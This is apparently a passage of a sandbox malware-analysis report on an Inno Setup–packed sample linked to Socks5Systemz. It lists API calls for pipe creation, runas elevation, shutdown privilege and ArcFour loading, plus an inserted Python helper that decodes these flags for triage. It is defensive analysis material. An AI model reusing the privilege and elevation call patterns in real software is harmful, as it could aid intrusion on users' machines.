                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                            • API String ID: 1968650500-2910565190
                                                                                            • Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                                            • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                                            • Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                                            • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00457D4F
                                                                                            • QueryPerformanceCounter.KERNEL32(02193858,00000000,00457FE2,?,?,02193858,00000000,?,004586DE,?,02193858,00000000), ref: 00457D58
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(02193858,02193858), ref: 00457D62
                                                                                            • GetCurrentProcessId.KERNEL32(?,02193858,00000000,00457FE2,?,?,02193858,00000000,?,004586DE,?,02193858,00000000), ref: 00457D6B
                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02193858,02193858), ref: 00457DEF
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
                                                                                            • CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                            • API String ID: 770386003-3271284199
                                                                                            • Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                                            • Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
                                                                                            • Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                                            • Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69
                                                                                            APIs
                                                                                              • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                              • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                              • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                              • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC), ref: 00476E74
                                                                                              • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                              • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02192BDC,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00477034
                                                                                            • GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
                                                                                            • CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                            • API String ID: 883996979-221126205
                                                                                            • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                            • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                                            • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                            • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1631623395-0
                                                                                            • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                            • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                                            • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                            • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004183A3
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                            • GetWindowRect.USER32(?), ref: 004183DC
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                            • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                            • String ID: ,
                                                                                            • API String ID: 2266315723-3772416878
                                                                                            • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                            • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                            • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                            • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                            • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                                            • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                            • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
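                                                                                            Added triage helper for the three records above (the CreateNamedPipeA/CreateProcessA launcher whose strings name the InnoSetup64BitHelper pipe, the ShellExecuteEx record whose strings include runas, and the SeShutdownPrivilege/ExitWindowsEx record). This is example code written for this page; it is not part of the Joe Sandbox report, of Inno Setup, or of the sample. It parses lines in the shape of the "APIs" listings, decodes the constant arguments a practitioner checks by hand (the CreateNamedPipeA open mode 40080003 and pipe mode 00000006, the ExitWindowsEx flags 00000002), and matches pipe names built from the format string \\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x shown in the String ID line. Flag names and values are the Windows SDK definitions; the sample lines are constructed copies of report entries; the function names and the triage rules are this example's own. Caveat: Joe Sandbox argument columns are stack snapshots, so a value shown as ? or a shifted argument is reported as unknown rather than decoded, and the strings InnoSetup64BitHelper, isRS-???.tmp and ISCryptGetVersion mark these records as installer runtime code rather than the Socks5Systemz payload, so hits here are expected installer behaviour to be separated from payload behaviour, not findings on their own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: API lines copied in shape from the Joe Sandbox "APIs" listings.
SAMPLE_API_LINES = """\
• GetTickCount.KERNEL32 ref: 00457D4F
• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
• ShellExecuteEx.SHELL32(0000003C), ref: 00477034
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
• ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
"""

# One "APIs" bullet: optional "Part of subcall function XXXX:" prefix, Api.MODULE, optional (args), ref: addr
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Windows SDK constants (winbase.h / winuser.h)
PIPE_OPEN_MODE: Dict[int, str] = {
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x00080000: "FILE_FLAG_FIRST_PIPE_INSTANCE",
    0x00000003: "PIPE_ACCESS_DUPLEX",
}
PIPE_MODE: Dict[int, str] = {0x4: "PIPE_TYPE_MESSAGE", 0x2: "PIPE_READMODE_MESSAGE"}
EWX_FLAGS: Dict[int, str] = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE"}

# Pipe name produced by the format string in the String ID line: four %.8x fields, the
# last two concatenated, so 8-8-8-16 hex digits. Case-insensitive on purpose.
INNO_HELPER_PIPE = re.compile(
    r"^\\\\\.\\pipe\\InnoSetup64BitHelper-[0-9A-Fa-f]{8}-[0-9A-Fa-f]{8}-[0-9A-Fa-f]{8}-[0-9A-Fa-f]{16}$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)
    ref: int = 0
    subcall_of: Optional[int] = None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report-style API bullets; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def hex_arg(call: ApiCall, index: int) -> Optional[int]:
    """Argument `index` as int; None when the report shows '?' or the column is absent."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Name the bits of `value`; widest masks first so PIPE_ACCESS_DUPLEX (3) is not split."""
    names, remaining = [], value
    for bit in sorted(table, reverse=True):
        if remaining & bit == bit:
            names.append(table[bit])
            remaining &= ~bit
    if remaining:
        names.append(f"0x{remaining:08X}")  # bits the table does not know
    return names


def triage(calls: List[ApiCall]) -> List[str]:
    """Human-readable findings for the calls a triager checks by hand in these records."""
    out: List[str] = []
    for c in calls:
        if c.api == "CreateNamedPipeA":
            om, pm, inst = hex_arg(c, 1), hex_arg(c, 2), hex_arg(c, 3)
            om_s = "|".join(decode_flags(om, PIPE_OPEN_MODE)) if om is not None else "unknown"
            pm_s = "|".join(decode_flags(pm, PIPE_MODE)) if pm is not None else "unknown"
            out.append(f"{c.ref:08X} CreateNamedPipeA open_mode={om_s} pipe_mode={pm_s} max_instances={inst}")
        elif c.api == "ExitWindowsEx":
            fl = hex_arg(c, 0)
            fl_s = ("|".join(decode_flags(fl, EWX_FLAGS)) or "EWX_LOGOFF") if fl is not None else "unknown"
            out.append(f"{c.ref:08X} ExitWindowsEx flags={fl_s}")
        elif c.api == "LookupPrivilegeValueA" and len(c.args) > 1:
            out.append(f"{c.ref:08X} requests privilege {c.args[1]}")
        elif c.api == "ShellExecuteEx":
            out.append(f"{c.ref:08X} ShellExecuteEx cbSize={hex_arg(c, 0)} (check strings for 'runas')")
    return out


def is_inno_helper_pipe(name: str) -> bool:
    """True for a pipe name in the InnoSetup64BitHelper format (e.g. from Sysmon pipe events)."""
    return bool(INNO_HELPER_PIPE.match(name))


if __name__ == "__main__":
    for finding in triage(parse_api_lines(SAMPLE_API_LINES)):
        print(finding)
```

Run against the listing text of a record to get the decoded constants; feed pipe names from Sysmon event 17/18 (pipe created/connected) to is_inno_helper_pipe to tag the installer's helper pipe so it is not mistaken for payload IPC.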
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CryptVersion
                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                            • API String ID: 1951258720-508647305
                                                                                            • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                            • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                                            • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                            • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                                            • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                                            • String ID: isRS-$isRS-???.tmp
                                                                                            • API String ID: 134685335-3422211394
                                                                                            • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                            • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                                            • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                            • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                            • API String ID: 2238633743-1050967733
                                                                                            • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                            • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                                            • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                            • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                                            APIs
